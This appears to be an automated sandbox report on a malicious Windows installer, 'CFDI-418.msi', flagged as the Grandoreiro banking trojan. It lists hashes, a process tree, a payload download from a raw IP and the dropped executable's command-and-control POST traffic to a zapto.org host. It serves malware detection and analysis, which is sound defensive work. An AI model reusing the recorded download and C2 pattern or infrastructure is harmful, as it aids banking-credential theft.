Resubmissions

19/04/2023, 08:24 UTC

230419-ka3a6sbb6s 7

12/04/2023, 15:38 UTC

230412-s3a2dsdb75 10

Analysis

  • max time kernel
    150s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-es
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230220-es, locale:es-es, os:windows10-2004-x64, system:windows
  • submitted
    12/04/2023, 15:38 UTC

General

  • Target

    CFDI-418.msi

  • Size

    1.7MB

  • MD5

    436ec5aea13f250c2cccb899b09c30fb

  • SHA1

    d34643db6cb8269bc1ef7472f76c0f7613e68768

  • SHA256

    d85571ef1ca53d5dcac1a99b06a64af069a20dca7e9d8b7706556b1317b4fb2f

  • SHA512

    b5d52b50544452dcd9b877c7f77a4f2fd4961bcab745d1666e6f2221bfd2c416873c8d88518f8471297873899125313c62d25885d7870eec04bbc3be11f502df

  • SSDEEP

    49152:CgJZBYbX+lDiJ4H3fMUgmu1M88r6F5mCmR+iYVTA:lj8ulDHXDg/a8o6UYdA

Malware Config

Signatures

  • Detects Grandoreiro payload 5 IoCs
  • Grandoreiro

    Part of a group of banking trojans, targeting Spanish and Portuguese speaking countries.

  • LatentBot

    Modular trojan written in Delphi which has been in-the-wild since 2013.

  • Blocklisted process makes network request 1 IoCs
  • ASPack v2.12-2.42 2 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 8 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\CFDI-418.msi
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:676
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding E5A1241BAC43CFA3B384A16C58CC7554
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4412
      • C:\Nvsofrsv\UIDCASTER.exe
        "C:\Nvsofrsv\UIDCASTER.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of SetWindowsHookEx
        PID:1156

Network

  • flag-us
    DNS
    138.238.32.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    138.238.32.23.in-addr.arpa
    IN PTR
    Response
    138.238.32.23.in-addr.arpa
    IN PTR
    a23-32-238-138.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    http://50.114.32.174:244/king40.zip?Admin-Español%20(España,%20internacional)
    MsiExec.exe
    Remote address:
    50.114.32.174:244
    Request
    GET /king40.zip?Admin-Español%20(España,%20internacional) HTTP/1.1
    User-Agent: Msiexec
    Host: 50.114.32.174:244
    Response
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Content-Length: 18670124
    Accept-Ranges: bytes
    Server: HFS 2.4rc5
    Set-Cookie: HFS_SID_=0.913143346551806; path=/; HttpOnly
    ETag: 30C7D52D5F55D37314C0C492FB9D2D56
    Last-Modified: Wed, 12 Apr 2023 13:31:08 GMT
    Content-Disposition: attachment; filename*=UTF-8'"king40.zip";
  • flag-us
    DNS
    71.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    71.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    108.211.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    108.211.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    174.32.114.50.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    174.32.114.50.in-addr.arpa
    IN PTR
    Response
    174.32.114.50.in-addr.arpa
    IN PTR
    50-114-32-174.masterdaweb.com
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    0.77.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.77.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    time.nist.gov
    UIDCASTER.exe
    Remote address:
    8.8.8.8:53
    Request
    time.nist.gov
    IN A
    Response
    time.nist.gov
    IN CNAME
    ntp1.glb.nist.gov
    ntp1.glb.nist.gov
    IN A
    132.163.97.6
  • flag-us
    DNS
    mtb475f304a.zapto.org
    UIDCASTER.exe
    Remote address:
    8.8.8.8:53
    Request
    mtb475f304a.zapto.org
    IN A
    Response
    mtb475f304a.zapto.org
    IN A
    50.114.32.174
  • flag-us
    DNS
    6.97.163.132.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    6.97.163.132.in-addr.arpa
    IN PTR
    Response
    6.97.163.132.in-addr.arpa
    IN PTR
    time-e-wwv.nist.gov
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ACTION=HELLO
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ACTION=HELLO HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 7248
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 7247
    SET-COOKIE: ID=D9AC23F8AF5F4DA088B8E13144F99C57
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ACTION=START&ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ACTION=START&ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 7250
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 7249
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 180
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 16
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 33
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 12
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 34
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 16
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 30
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 13593
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 30
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 14
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 28
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 12
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 30
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 139
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 28
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 149
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 31
    Response
    HTTP/1.1 200 OK
    CONTENT-LENGTH: 15
  • flag-us
    POST
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    UIDCASTER.exe
    Remote address:
    50.114.32.174:443
    Request
    POST /$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57 HTTP/1.1
    HOST: 50.114.32.174
    CONTENT-LENGTH: 30
  • flag-us
    DNS
    assets.msn.com
    Remote address:
    8.8.8.8:53
    Request
    assets.msn.com
    IN A
    Response
    assets.msn.com
    IN CNAME
    assets.msn.com.edgekey.net
    assets.msn.com.edgekey.net
    IN CNAME
    e28578.d.akamaiedge.net
    e28578.d.akamaiedge.net
    IN A
    95.101.74.151
    e28578.d.akamaiedge.net
    IN A
    95.101.74.139
  • flag-nl
    GET
    https://assets.msn.com/serviceak/v1/news/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&activityId=c3d7b20e-ea23-4b3b-b97d-b5ded379f182&ocid=windows-windowsShell-feeds&user=m-681106677aa44fecb67ac912899aa560&Treatment=T6&MaximumDimensions=660x640&experience=Taskbar&AppVersion=1&osLocale=es-ES&caller=bgtask
    Remote address:
    95.101.74.151:443
    Request
    GET /serviceak/v1/news/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&activityId=c3d7b20e-ea23-4b3b-b97d-b5ded379f182&ocid=windows-windowsShell-feeds&user=m-681106677aa44fecb67ac912899aa560&Treatment=T6&MaximumDimensions=660x640&experience=Taskbar&AppVersion=1&osLocale=es-ES&caller=bgtask HTTP/2.0
    host: assets.msn.com
    x-search-account: None
    accept-encoding: gzip, deflate
    x-device-machineid: {B5D67584-1FEF-4C28-8532-FCD3CF2C23D0}
    x-userageclass: Unknown
    x-bm-market: ES
    x-bm-dateformat: dd/MM/yyyy
    x-device-ossku: 48
    x-bm-dtz: 0
    x-deviceid: 0100B2E609000CC3
    x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11D898D7,FX:11DB147C,FX:11DE505A,FX:11E11E97,FX:11E3E2BA,FX:11E50151,FX:11E9EE98,FX:11F1992A,FX:11F4161E,FX:11F41B68,FX:11FB0F2F,FX:1201B330,FX:1202B7FC,FX:120BB68E,FX:121A20E1,FX:121BF15F,FX:121E5EC8,FX:122D8E86,FX:123031A3,FX:1231B88B,FX:123371B1,FX:1233C945,FX:123D7C31,FX:1240013C,FX:1246E4A3,FX:1248306D,FX:124B38D0,FX:1250080B,FX:125A7FDA,FX:1264FA75,FX:126DBC22,FX:127159BE,FX:12769734,FX:127C935B,FX:127DC03A,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:129135BB
    sitename: www.msn.com
    x-bm-theme: 000000;0078d7
    muid: 681106677AA44FECB67AC912899AA560
    x-agent-deviceid: 0100B2E609000CC3
    x-bm-onlinesearchdisabled: true
    x-bm-cbt: 1681321248
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.2.19041; 10.0.0.0.19041.1288) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    x-device-isoptin: false
    accept-language: es-ES, es, en-US, en
    x-device-touch: false
    x-device-clientsession: AC038B2FF4A941EEAF4BE0E175E3657A
    cookie: MUID=681106677AA44FECB67AC912899AA560
    Response
    HTTP/2.0 200
    content-type: application/json; charset=utf-8
    server: Kestrel
    access-control-allow-credentials: true
    access-control-allow-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent
    access-control-allow-methods: PUT,PATCH,POST,GET,OPTIONS,DELETE
    access-control-allow-origin: *.msn.com
    access-control-expose-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType,traceparent
    content-encoding: gzip
    ddd-authenticatedwithjwtflow: False
    ddd-usertype: AnonymousMuid
    ddd-tmpl: SevereWeather_cold:1;winbadge:1;coldStartUpsell:1;Nowcast_cold:1;tbn:0;lowT:0;SportsMatch_all:1;WildFire_cold:1;partialResponse:1;TeaserTemp_cold:1;coldStart:1;TeaserVisibility_cold:1;lowC:0
    ddd-feednewsitemcount: 0
    x-wpo-activityid: 2E723C4B-5F0B-4696-8D18-42C08A038718|2023-04-12T15:40:50.6214239Z|fabric:/wpo|FRC|WPO_26
    ddd-activityid: 2e723c4b-5f0b-4696-8d18-42c08a038718
    ddd-strategyexecutionlatency: 00:00:00.1679464
    ddd-debugid: 2e723c4b-5f0b-4696-8d18-42c08a038718|2023-04-12T15:40:50.6269706Z|fabric:/winfeed|FRC|WinFeed_70
    onewebservicelatency: 169
    x-msedge-responseinfo: 169
    x-ceto-ref: 6436d10247154eb98c68c020d7cfcb1a|2023-04-12T15:40:50.454Z
    expires: Wed, 12 Apr 2023 15:40:50 GMT
    date: Wed, 12 Apr 2023 15:40:50 GMT
    content-length: 1856
    akamai-request-bc: [a=92.123.71.151,b=205081929,c=g,n=NL__SCHIPHOL,o=20940],[a=20.74.25.147,c=o]
    server-timing: clientrtt; dur=17, clienttt; dur=186, origin; dur=185 , cdntime; dur=1
    akamai-cache-status: Miss from child
    akamai-server-ip: 92.123.71.151
    akamai-request-id: c394d49
    x-as-suppresssetcookie: 1
    cache-control: private, max-age=0
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
    timing-allow-origin: *
    vary: Origin
  • flag-us
    DNS
    151.74.101.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    151.74.101.95.in-addr.arpa
    IN PTR
    Response
    151.74.101.95.in-addr.arpa
    IN PTR
    a95-101-74-151.deploy.static.akamaitechnologies.com
  • 50.114.32.174:244
    http://50.114.32.174:244/king40.zip?Admin-Español%20(España,%20internacional)
    http
    MsiExec.exe
    675.4kB
    19.3MB
    14597
    14561

    HTTP Request

    GET http://50.114.32.174:244/king40.zip?Admin-Español%20(España,%20internacional)

    HTTP Response

    200
  • 20.189.173.12:443
    322 B
    7
  • 8.238.20.126:80
    322 B
    7
  • 8.238.20.126:80
    322 B
    7
  • 173.223.113.164:443
    322 B
    7
  • 132.163.97.6:13
    time.nist.gov
    UIDCASTER.exe
    190 B
    223 B
    4
    4
  • 132.163.97.6:13
    time.nist.gov
    UIDCASTER.exe
    190 B
    132 B
    4
    3
  • 132.163.97.6:13
    time.nist.gov
    UIDCASTER.exe
    190 B
    132 B
    4
    3
  • 132.163.97.6:13
    time.nist.gov
    UIDCASTER.exe
    190 B
    223 B
    4
    4
  • 132.163.97.6:13
    time.nist.gov
    UIDCASTER.exe
    190 B
    223 B
    4
    4
  • 50.114.32.174:443
    http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
    http
    UIDCASTER.exe
    25.2kB
    30.8kB
    41
    45

    HTTP Request

    POST http://50.114.32.174/$rdgate?ACTION=HELLO

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ACTION=START&ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57

    HTTP Response

    200

    HTTP Request

    POST http://50.114.32.174/$rdgate?ID=D9AC23F8AF5F4DA088B8E13144F99C57
  • 95.101.74.151:443
    https://assets.msn.com/serviceak/v1/news/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&activityId=c3d7b20e-ea23-4b3b-b97d-b5ded379f182&ocid=windows-windowsShell-feeds&user=m-681106677aa44fecb67ac912899aa560&Treatment=T6&MaximumDimensions=660x640&experience=Taskbar&AppVersion=1&osLocale=es-ES&caller=bgtask
    tls, http2
    2.6kB
    11.1kB
    20
    19

    HTTP Request

    GET https://assets.msn.com/serviceak/v1/news/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&activityId=c3d7b20e-ea23-4b3b-b97d-b5ded379f182&ocid=windows-windowsShell-feeds&user=m-681106677aa44fecb67ac912899aa560&Treatment=T6&MaximumDimensions=660x640&experience=Taskbar&AppVersion=1&osLocale=es-ES&caller=bgtask

    HTTP Response

    200
  • 8.8.8.8:53
    138.238.32.23.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    138.238.32.23.in-addr.arpa

  • 8.8.8.8:53
    241.150.49.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.150.49.20.in-addr.arpa

  • 8.8.8.8:53
    71.159.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    71.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    108.211.229.192.in-addr.arpa
    dns
    74 B
    145 B
    1
    1

    DNS Request

    108.211.229.192.in-addr.arpa

  • 8.8.8.8:53
    174.32.114.50.in-addr.arpa
    dns
    72 B
    115 B
    1
    1

    DNS Request

    174.32.114.50.in-addr.arpa

  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    0.77.109.52.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    0.77.109.52.in-addr.arpa

  • 8.8.8.8:53
    time.nist.gov
    dns
    UIDCASTER.exe
    59 B
    98 B
    1
    1

    DNS Request

    time.nist.gov

    DNS Response

    132.163.97.6

  • 8.8.8.8:53
    mtb475f304a.zapto.org
    dns
    UIDCASTER.exe
    67 B
    83 B
    1
    1

    DNS Request

    mtb475f304a.zapto.org

    DNS Response

    50.114.32.174

  • 8.8.8.8:53
    6.97.163.132.in-addr.arpa
    dns
    71 B
    104 B
    1
    1

    DNS Request

    6.97.163.132.in-addr.arpa

  • 8.8.8.8:53
    assets.msn.com
    dns
    60 B
    166 B
    1
    1

    DNS Request

    assets.msn.com

    DNS Response

    95.101.74.151
    95.101.74.139

  • 8.8.8.8:53
    151.74.101.95.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    151.74.101.95.in-addr.arpa

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Config.Msi\e566f99.rbs

    Filesize

    754B

    MD5

    30041535412d0a2e1b55a3bf9498ba43

    SHA1

    64ec57f945be08de3963cf48a73809a5c621dd25

    SHA256

    9b5f9f1405ab87c80b079eb099ec5a292259dc7e210d12ca6bc0cfcd57126e29

    SHA512

    d19f61fccda7ede4e98f598b53c81dd82bbff4c35e9577e44545658b7cf1545e0528b21a43b0c4f608323d3a37ef24681266c1107b793130eff6ad4c63795859

  • C:\Nvsofrsv\UIDCASTER.exe

    Filesize

    2.2MB

    MD5

    b5485d229f8078575d639fb903b4fca7

    SHA1

    6a67a6bb694df592819d398a645504b2c7a2221c

    SHA256

    9625e775e955281732270b7a0fc468bef83b468be85e82e0659973aefa369782

    SHA512

    5d54f343b986d33c3e7de1450d8b6386bac66a9aeb8a77b0a81652cf2592e8f85847185d6e09e8c486a224bf21eb195308be1f489bbac615bf99d5fc760d85f8

  • C:\Nvsofrsv\dbghelp.dll

    Filesize

    1.2MB

    MD5

    4003e34416ebd25e4c115d49dc15e1a7

    SHA1

    faf95ec65cde5bd833ce610bb8523363310ec4ad

    SHA256

    c06430b8cb025be506be50a756488e1bcc3827c4f45158d93e4e3eeb98ce1e4f

    SHA512

    88f5d417377cd62bde417640a79b6ac493e80f0c8b1f63a99378a2a67695ef8e4a541cedb91acfa296ed608e821fee466983806f0d082ed2e74b0cd93eb4fb84

  • C:\Nvsofrsv\uires.dll

    Filesize

    13.0MB

    MD5

    87c7411e05ff159a3707869adc9d5c01

    SHA1

    d147cfdc5d2ea979aa757423a0a22577c45acbe1

    SHA256

    207d66dae08ca39065019355802604768b213ed2817e78bea128f136784af6a7

    SHA512

    a5a22ed12fa2ea7d343fa38e527fab8735924e350dd138b72e2bec4417825b8bab52e6814ced320f67030fa3a0b88afd7a50ac1714476f40d9ec54c33acae922

  • C:\Nvsofrsv\zlibai.dll

    Filesize

    151.5MB

    MD5

    fbc66087992dfd5da6d5955144df904d

    SHA1

    d33433f0c79ebaf3b9169d9c596619110f0db5ca

    SHA256

    1b14c6d1c6c64ac56f11787ce86e631694361aac36bbf3dfb3c18615299b3f3f

    SHA512

    9b8de432b08fa758b1445db68da350eb794392ba85185f9311a618bd9383a71d91dffaa61741103c81e9a0ee14eeb7da33410f9e9f73f93929cec82941166ff2

  • C:\Windows\Installer\MSI7033.tmp

    Filesize

    557KB

    MD5

    2c9c51ac508570303c6d46c0571ea3a1

    SHA1

    e3e0fe08fa11a43c8bca533f212bdf0704c726d5

    SHA256

    ff86c76a8d5846b3a1ad58ff2fd8e5a06a84eb5899cdee98e59c548d33335550

    SHA512

    df5f1def5aac44f39a2dfde9c6c73f15f83a7374b4ad42b67e425ccb7ac99a64c5701b676ae46d2f7167a04a955158031a839e7878d100aaf8fab0ce2059f127

  • C:\Windows\Installer\MSI813C.tmp

    Filesize

    557KB

    MD5

    2c9c51ac508570303c6d46c0571ea3a1

    SHA1

    e3e0fe08fa11a43c8bca533f212bdf0704c726d5

    SHA256

    ff86c76a8d5846b3a1ad58ff2fd8e5a06a84eb5899cdee98e59c548d33335550

    SHA512

    df5f1def5aac44f39a2dfde9c6c73f15f83a7374b4ad42b67e425ccb7ac99a64c5701b676ae46d2f7167a04a955158031a839e7878d100aaf8fab0ce2059f127

  • C:\Windows\Installer\MSI8814.tmp

    Filesize

    1000KB

    MD5

    aaf6ae1ac7bcb61b5337d6446087d415

    SHA1

    0b21e6e4a0cd5486a043001bf1cf34e05fe5e9f0

    SHA256

    828bc53af70c73b1fb1464cc024c7d476ce6e16e75770865930d2635033c2137

    SHA512

    72f14c95c2f18946618e18a0b2189aa58fb413516241ab8257a2611877d06e533649099a3f11ef132cc5f20fe72f1fb19e9a72dc08b0c6f0894eb36c6a032c6a

  • memory/1156-208-0x000000000C4E0000-0x000000000C4E1000-memory.dmp

    Filesize

    4KB

  • memory/1156-214-0x000000000CDF0000-0x000000000CDF1000-memory.dmp

    Filesize

    4KB

  • memory/1156-201-0x0000000001400000-0x0000000002400000-memory.dmp

    Filesize

    16.0MB

  • memory/1156-216-0x000000000C610000-0x000000000C611000-memory.dmp

    Filesize

    4KB

  • memory/1156-203-0x000000000AD40000-0x000000000AD41000-memory.dmp

    Filesize

    4KB

  • memory/1156-204-0x000000000C380000-0x000000000C381000-memory.dmp

    Filesize

    4KB

  • memory/1156-205-0x000000000C4B0000-0x000000000C4B1000-memory.dmp

    Filesize

    4KB

  • memory/1156-206-0x000000000C4C0000-0x000000000C4C1000-memory.dmp

    Filesize

    4KB

  • memory/1156-207-0x000000000C4D0000-0x000000000C4D1000-memory.dmp

    Filesize

    4KB

  • memory/1156-215-0x000000000C610000-0x000000000C611000-memory.dmp

    Filesize

    4KB

  • memory/1156-209-0x0000000001400000-0x0000000002400000-memory.dmp

    Filesize

    16.0MB

  • memory/1156-213-0x000000000CC20000-0x000000000CC21000-memory.dmp

    Filesize

    4KB

  • memory/4412-154-0x0000000073990000-0x0000000073CC5000-memory.dmp

    Filesize

    3.2MB

  • memory/4412-151-0x0000000073990000-0x0000000073CC5000-memory.dmp

    Filesize

    3.2MB

  • memory/4412-152-0x0000000073990000-0x0000000073CC5000-memory.dmp

    Filesize

    3.2MB

  • memory/4412-153-0x0000000073990000-0x0000000073CC5000-memory.dmp

    Filesize

    3.2MB

  • memory/4412-156-0x0000000073990000-0x0000000073CC5000-memory.dmp

    Filesize

    3.2MB

  • memory/4412-155-0x0000000073990000-0x0000000073CC5000-memory.dmp

    Filesize

    3.2MB
